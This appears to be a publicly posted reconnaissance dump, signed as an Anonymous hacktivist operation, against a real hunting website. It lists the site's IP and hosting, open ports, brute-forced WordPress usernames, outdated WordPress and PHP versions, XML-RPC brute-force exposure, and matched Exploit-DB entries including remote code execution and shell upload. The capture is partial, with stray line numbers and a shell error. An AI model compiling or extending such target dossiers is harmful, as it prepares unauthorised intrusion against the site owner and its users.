15548 Brute Forcing Author IDs - Time: 00:00:12 <==> (10 / 10) 100.00% Time: 00:00:12
15549
15550[i] User(s) Identified:
15551
15552[+] cazahispanica
15553 | Found By: Rss Generator (Passive Detection)
15554 | Confirmed By:
15555 | Rss Generator (Aggressive Detection)
15556 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
15557
15558[+] wordpress%20support
15559 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
15560
15561[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
15562[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
15563
15564[+] Finished: Sun Jan 5 03:09:29 2020
15565[+] Requests Done: 38
15566[+] Cached Requests: 22
15567[+] Data Sent: 9.762 KB
15568[+] Data Received: 551.326 KB
15569[+] Memory used: 118.65 MB
15570[+] Elapsed time: 00:00:36
15571###################################################################################################################################
15572[+] URL: http://www.cazahispanica.com/
15573[+] Started: Sun Jan 5 03:13:17 2020
15574
15634[+] Enumerating Users (via Passive and Aggressive Methods)
15635 Brute Forcing Author IDs - Time: 00:00:04 <============> (10 / 10) 100.00% Time: 00:00:04
15636
15651[+] Finished: Sun Jan 5 03:13:25 2020
15652[+] Requests Done: 14
15653[+] Cached Requests: 46
15654[+] Data Sent: 3.368 KB
15655[+] Data Received: 51.596 KB
15656[+] Memory used: 117.869 MB
15657[+] Elapsed time: 00:00:08
15658####################################################################################################################################
15659[INFO] ------TARGET info------
15660[*] TARGET: http://www.cazahispanica.com/
15661[*] TARGET IP: 217.160.131.142
15662[INFO] NO load balancer detected for www.cazahispanica.com...
15663[*] DNS servers: dns47.servidoresdns.net.
15664[*] TARGET server: Apache
15665[*] CC: DE
15666[*] Country: Germany
15667[*] RegionCode: BW
15668[*] RegionName: Baden-Württemberg
15669[*] City: Karlsruhe
15670[*] ASN: AS8560
15671[*] BGP_PREFIX: 217.160.0.0/16
15672[*] ISP: ONEANDONE-AS 1&1 IONOS SE, DE
15673[INFO] DNS enumeration:
15674[*] webmail.cazahispanica.com serviciodecorreo.es. 82.223.190.234
15675[INFO] Possible abuse mails are:
15676[*] abuse@1and1.com
15677[*] abuse@cazahispanica.com
15678[*] abuse@www.cazahispanica.com
15679[INFO] NO PAC (Proxy Auto Configuration) file FOUND
15680[ALERT] robots.txt file FOUND in http://www.cazahispanica.com/robots.txt
15681[INFO] Checking for HTTP status codes recursively from http://www.cazahispanica.com/robots.txt
15682[INFO] Status code Folders
15683[*] 200 http://www.cazahispanica.com/wp-admin/admin-ajax.php
15684[INFO] Starting FUZZing in http://www.cazahispanica.com/FUzZzZzZzZz...
15685[INFO] Status code Folders
15686[ALERT] Look in the source code. It may contain passwords
15687[INFO] Links found from http://www.cazahispanica.com/ http://217.160.131.142/:
15733cut: intervalle de champ incorrecte
Saisissez « cut --help » pour plus d'informations.
[INFO] Shodan detected the following opened ports on 217.160.131.142:
[*] 21
[*] 214
[*] 22
[*] 3306
[*] 443
[*] 80
[*] 8443
[*] 8880
[INFO] ------VirusTotal SECTION------
[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
[INFO] ------Alexa Rank SECTION------
[INFO] Percent of Visitors Rank in Country:
[INFO] Percent of Search Traffic:
[INFO] Percent of Unique Visits:
[INFO] Total Sites Linking In:
[*] Total Sites
[INFO] Useful links related to www.cazahispanica.com - 217.160.131.142:
[*] https://www.virustotal.com/pt/ip-address/217.160.131.142/information/
[*] https://www.hybrid-analysis.com/search?host=217.160.131.142
[*] https://www.shodan.io/host/217.160.131.142
[*] https://www.senderbase.org/lookup/?search_string=217.160.131.142
[*] https://www.alienvault.com/open-threat-exchange/ip/217.160.131.142
[*] http://pastebin.com/search?q=217.160.131.142
[*] http://urlquery.net/search.php?q=217.160.131.142
[*] http://www.alexa.com/siteinfo/www.cazahispanica.com
[*] http://www.google.com/safebrowsing/diagnostic?site=www.cazahispanica.com
[*] https://censys.io/ipv4/217.160.131.142
[*] https://www.abuseipdb.com/check/217.160.131.142
[*] https://urlscan.io/search/#217.160.131.142
[*] https://github.com/search?q=217.160.131.142&type=Code
[INFO] Useful links related to AS8560 - 217.160.0.0/16:
[*] http://www.google.com/safebrowsing/diagnostic?site=AS:8560
[*] https://www.senderbase.org/lookup/?search_string=217.160.0.0/16
[*] http://bgp.he.net/AS8560
[*] https://stat.ripe.net/AS8560
[INFO] Date: 05/01/20 | Time: 03:14:17
[INFO] Total time: 0 minute(s) and 56 second(s)
####################################################################################################################################
[-] Target: http://www.cazahispanica.com (217.160.131.142)
[M] Website Not in HTTPS: http://www.cazahispanica.com
[I] Server: Apache
[I] X-Powered-By: PHP/5.6.40
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://www.cazahispanica.com/robots.txt
[I] CMS Detection: WordPress
[I] Wordpress Version: 4.4.21
[M] EDB-ID: 47720 "WordPress Core 5.3 - User Disclosure"
[M] EDB-ID: 47800 "WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service"
[M] EDB-ID: 47557 "WordPress Core 5.2.4 - Cross-Origin Resource Sharing"
[M] EDB-ID: 47361 "WordPress 5.2.3 - Cross-Site Host Modification"
[M] EDB-ID: 47690 "WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts"
[M] EDB-ID: 46460-wordpress-5
[M] EDB-ID: 46511 "WordPress Core 5.0 - Remote Code Execution"
[M] EDB-ID: 46662 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)"
[M] EDB-ID: 44949 "WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion"
[M] EDB-ID: 41963 "WordPress < 4.7.4 - Unauthorized Password Reset"
[M] EDB-ID: 41497 "WordPress < 4.7.1 - Username Enumeration"
[M] EDB-ID: 41223 "WordPress 4.7.0/4.7.1 - Content Injection (Python)"
[M] EDB-ID: 41224 "WordPress 4.7.0/4.7.1 - Content Injection (Ruby)"
[M] EDB-ID: 41962 "WordPress 4.6 - Remote Code Execution"
[M] EDB-ID: 42024 "WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)"
[M] EDB-ID: 40288 "WordPress 4.5.3 - Directory Traversal / Denial of Service"
[I] Wordpress Theme: medacorp
[-] WordPress usernames identified:
[M] cazahispanica
[M] support
[M] wordpresssupport
[M] XML-RPC services are enabled
[M] Website vulnerable to XML-RPC Brute Force Vulnerability
[I] Autocomplete Off Not Found: http://www.cazahispanica.com/wp-login.php
[-] Default WordPress Files:
[I] http://www.cazahispanica.com/license.txt
[I] http://www.cazahispanica.com/readme.html
[I] http://www.cazahispanica.com/wp-includes/ID3/license.commercial.txt
[I] http://www.cazahispanica.com/wp-includes/ID3/license.txt
[I] http://www.cazahispanica.com/wp-includes/ID3/readme.txt
[I] http://www.cazahispanica.com/wp-includes/images/crystal/license.txt
[I] http://www.cazahispanica.com/wp-includes/js/plupload/license.txt
[I] http://www.cazahispanica.com/wp-includes/js/swfupload/license.txt
[I] http://www.cazahispanica.com/wp-includes/js/tinymce/license.txt
[-] Searching Wordpress Plugins ...
[I] akismet
[M] EDB-ID: 37826 "WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities"
[M] EDB-ID: 37902 "WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities"
[I] essential-grid
[I] feed
[M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
[I] js_composer
[I] landing-pages
[I] revslider
[I] Checking for Directory Listing Enabled ...
[-] Date & Time: 05/01/2020 03:14:02
[-] Completed in: 0:05:08
######################################################################################################################################
Anonymous JTSEC #OpDefendTheWild Full Recon #8